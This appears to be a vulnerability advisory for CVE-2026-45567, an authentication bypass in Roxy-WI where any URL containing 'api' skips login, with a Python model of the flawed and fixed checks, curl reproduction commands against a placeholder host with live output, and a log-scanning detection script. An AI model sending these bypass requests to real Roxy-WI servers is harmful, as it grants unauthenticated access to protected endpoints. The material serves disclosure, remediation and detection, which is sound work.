VYPR
High severity · CVSS 8.3 · NVD Advisory · Published Jun 10, 2026 · Updated Jun 10, 2026

CVE-2026-45567

Description

Roxy-WI versions 8.2.6.4 and prior suffer an authentication bypass via a flawed URL check, allowing unauthenticated access to sensitive endpoints like /api/gpt.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Roxy-WI versions 8.2.6.4 and prior contain an authentication bypass vulnerability. The before_request hook in app/login.py incorrectly skips authentication if the substring api is present anywhere in the request URL, including the query string. This was intended to allow access to the API blueprint, but due to a logic error and a missing decorator on the /api/gpt endpoint, it allows unauthenticated access to that specific route [1].

Exploitation

An unauthenticated attacker exploits this by sending a POST request to `/api/gpt` on the affected host. No privileges or user interaction are required: the global authentication hook is skipped simply because the substring api appears in the request URL, and the `/api/gpt` handler performs no check of its own [1].

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to bypass authentication and directly access the /api/gpt endpoint. This can lead to unauthorized actions or information disclosure, depending on the functionality of the /api/gpt endpoint, which makes an external API call with potentially sensitive license information [1].

Mitigation

At the time of publication there is no publicly available patch for this vulnerability; Roxy-WI versions 8.2.6.4 and prior are affected [1]. Users are advised to monitor the project's security advisories for updates. Until a fix ships, the only reliable measure is to restrict network access to the Roxy-WI interface, since the bypass requires nothing beyond reachability and a crafted URL.

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2 entries (inferred, no CPE assigned)
  • Roxy Wi / Roxy-WI
    • (no CPE) range: <= 8.2.6.4
    • (no CPE) range: <= 8.2.6.4 (duplicate entry for the same range)

Patches

None discovered yet (0).

Vulnerability mechanics

Root cause

"A global request hook incorrectly bypasses authentication for any URL containing the substring 'api'."

Attack vector

An unauthenticated attacker can exploit this vulnerability by including the substring 'api' anywhere in the request URL, such as in the query string. This bypasses the authentication check in the `check_login` function. Specifically, the `/api/gpt` endpoint, which lacks its own authentication decorators, becomes directly accessible. Additionally, other sensitive routes can be accessed by appending parameters like `?api=1` to their URLs, bypassing the intended authentication mechanisms [ref_id=1].

Affected code

The vulnerability resides in the global `before_request` hook located in `app/login.py` (lines 14-32). The `check_login` function within this hook incorrectly handles URLs containing 'api'. The `/api/gpt` endpoint, which is directly registered on the app and lacks authentication, is detailed in `app/routes/main/routes.py` (lines 171-200) [ref_id=1].

What the fix does

The advisory indicates that no patches are publicly available at the time of publication. The recommended remediation involves replacing the substring check with an explicit allowlist of public endpoints and ensuring that routes like `/api/gpt` are either protected by `@jwt_required()` or moved to the API blueprint where authentication is handled [ref_id=1].
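The following is an added illustration, not Roxy-WI's code: a minimal model of the flawed `before_request` check described above, placed next to an allowlist-based replacement, with a tiny dispatcher that returns the status code each probe would get. The route table, the public-path list, the token value and the function names are assumptions made for the example; the real `check_login` is in `app/login.py` and is not reproduced here.

```python
# Added illustration, not Roxy-WI's code: a minimal model of the flawed
# before_request check next to an allowlist version. Route names, the
# public-path list and the token value are assumptions.
from urllib.parse import urlsplit

API_PREFIX = "/api/"
PUBLIC_PATHS = ("/login", "/static/")          # assumed public endpoints
VALID_TOKEN = "assumed-valid-jwt"              # stand-in for a real JWT

# Hypothetical route table: path -> True if the handler enforces JWT itself
# (the API blueprint), False if it relies on the global session check.
VULN_ROUTES = {
    "/overview/": False,     # session-protected UI page
    "/api/gpt": False,       # registered on the app, no decorator: the bug
    "/api/servers": True,    # blueprint route carrying @jwt_required()
    "/login": False,         # public
}
# After the fix, /api/gpt enforces JWT like the rest of the API.
FIXED_ROUTES = {**VULN_ROUTES, "/api/gpt": True}


def _is_public(path: str) -> bool:
    return any(path == p or path.startswith(p) for p in PUBLIC_PATHS)


def vulnerable_skips_login(url: str) -> bool:
    """Root cause: substring test over the full URL, query string included."""
    return "api" in url or _is_public(urlsplit(url).path)


def fixed_skips_login(url: str) -> bool:
    """Decide on the path alone, and only for an explicit prefix/allowlist."""
    path = urlsplit(url).path
    return path.startswith(API_PREFIX) or _is_public(path)


def handle(url, *, session=False, bearer=None,
           skip=vulnerable_skips_login, routes=VULN_ROUTES) -> int:
    """Simulate before_request plus route dispatch; return the HTTP status."""
    path = urlsplit(url).path
    if path not in routes:
        return 404
    if not session and not skip(url):
        return 302                      # redirect to /login
    if routes[path] and bearer != VALID_TOKEN:
        return 401                      # route-level JWT check
    return 200


def demo() -> dict:
    """Status codes for the advisory's probe URLs, before and after the fix."""
    vuln = dict(skip=vulnerable_skips_login, routes=VULN_ROUTES)
    fixed = dict(skip=fixed_skips_login, routes=FIXED_ROUTES)
    return {
        "vuln /overview/?api=1": handle("/overview/?api=1", **vuln),
        "vuln /overview/?x=1": handle("/overview/?x=1", **vuln),
        "vuln POST /api/gpt": handle("/api/gpt", **vuln),
        "fixed /overview/?api=1": handle("/overview/?api=1", **fixed),
        "fixed /api/gpt no token": handle("/api/gpt", **fixed),
        "fixed /api/gpt with token": handle("/api/gpt", bearer=VALID_TOKEN, **fixed),
    }


if __name__ == "__main__":
    for probe, status in demo().items():
        print(f"{probe:28} -> {status}")
```

Two things change in the fixed variant: the exemption is decided on the parsed path rather than the raw URL, so a query string can no longer influence it, and exempting the `/api/` prefix is only safe because every route under it carries its own JWT check. Either change alone leaves a hole: the path-only check still lets an undecorated `/api/gpt` through, and decorating `/api/gpt` still leaves `?api=1` working on every UI route.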

Preconditions

  • auth: no authentication is required to exploit this vulnerability.
  • network: the target server must be reachable over the network.

Reproduction

# /api/gpt — unauthenticated, reaches the handler.
```bash
curl -s -o /dev/null -w '/api/gpt → HTTP %{http_code}\n' \
  -X POST http://victim.example/api/gpt \
  -H 'Content-Type: application/json' -d '{"prompt":"x"}'
```

# Bypass on a normally-auth-required path: append ?api=1.
```bash
curl -s -o /dev/null -w '/overview/?api=1 → HTTP %{http_code}\n' \
  'http://victim.example/overview/?api=1'
```

# Same path WITHOUT 'api' in URL → 302 redirect to /login.
```bash
curl -s -o /dev/null -w '/overview/?x=1 → HTTP %{http_code}\n' \
  'http://victim.example/overview/?x=1'
```

Live output (commit d72ea494):

```text
/api/gpt → HTTP 500          # 500 from upstream (https://roxy-wi.org/api/gpt unreachable in container); handler reached without auth
/overview/?api=1 → HTTP 500  # auth check skipped; reached the handler
/overview/?x=1 → HTTP 302    # auth check fired; redirected to /login
```

The HTTP-status diff between ?api=1 and ?x=1 proves the bypass. [ref_id=1]
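The same status-code signal can be turned into a detection. The following is an added example, not part of the advisory: it scans reverse-proxy access logs for requests whose path is outside the `/api/` prefix but whose URL still contains `api` (the bypass condition), and for any hit on the undecorated `/api/gpt` route. The log lines are constructed for the example, and the combined-log-format regex is an assumption about what the proxy in front of Roxy-WI writes.

```python
# Added detection example (not part of the advisory): flag access-log lines
# that carry the bypass signal. The log lines are constructed, and the
# combined-log-format regex is an assumption about the proxy's log format.
import re
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: two probes from one source, two benign controls,
# one blueprint route that correctly answered 401, one public page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2026:12:00:01 +0000] "GET /overview/?api=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jun/2026:12:00:02 +0000] "POST /api/gpt HTTP/1.1" 500 212
198.51.100.3 - - [10/Jun/2026:12:00:03 +0000] "GET /overview/?x=1 HTTP/1.1" 302 0
198.51.100.3 - - [10/Jun/2026:12:00:04 +0000] "GET /api/servers HTTP/1.1" 401 40
203.0.113.7 - - [10/Jun/2026:12:00:05 +0000] "GET /users/?page=2&api=true HTTP/1.1" 200 3300
198.51.100.3 - - [10/Jun/2026:12:00:06 +0000] "GET /login HTTP/1.1" 200 900
"""


def is_api_route(path: str) -> bool:
    """True only for the API blueprint prefix, matched on the path."""
    return path == "/api" or path.startswith("/api/")


def scan(log_text: str) -> list:
    """Return (ip, method, target, status, reason) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # not combined log format; skip
        target = m["target"]
        path = urlsplit(target).path
        if not is_api_route(path) and "api" in target:
            # The substring check in the vulnerable hook fires on the whole
            # URL, so 'api' in a query string of a UI path is the bypass.
            reason = "substring 'api' outside the API prefix: auth-bypass probe"
        elif path == "/api/gpt":
            reason = "request to the undecorated /api/gpt route"
        else:
            continue
        findings.append((m["ip"], m["method"], target, int(m["status"]), reason))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The status column is kept in each finding because it is what separates a probe from a success: a 302 on a UI path means the hook redirected as intended, whereas a 200 or 500 on a UI path that only carries `api` in its query string means the handler was reached without a session. Note that a legitimate non-API path whose name happens to contain `api` would also trip this rule; in that case tighten the check to the query string only.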

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (1)

News mentions (1)